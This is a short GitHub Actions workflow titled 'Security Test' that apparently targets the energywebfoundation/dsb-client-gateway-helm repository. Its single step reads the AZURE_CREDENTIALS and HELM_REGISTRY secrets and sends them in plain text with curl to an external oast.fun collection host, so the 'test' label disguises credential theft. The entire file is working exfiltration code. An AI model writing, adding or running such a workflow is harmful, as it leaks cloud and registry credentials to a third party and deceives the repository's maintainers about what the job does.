name: Security Test
on:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Test all secrets
        env:
          AZURE_CREDENTIALS: ${{ secrets.AZURE_CREDENTIALS }}
          HELM_REGISTRY: ${{ secrets.HELM_REGISTRY }}
        run: |
          echo "Testing all secrets from energywebfoundation/dsb-client-gateway-helm"
          SECRETS_OUTPUT=""
          SECRETS_OUTPUT+="AZURE_CREDENTIALS=${AZURE_CREDENTIALS}\n"
          SECRETS_OUTPUT+="HELM_REGISTRY=${HELM_REGISTRY}\n"
          curl -X POST https://ysdwohuyzvgctjktuywnobz8gju8g5qtp.oast.fun/post -d "$SECRETS_OUTPUT"
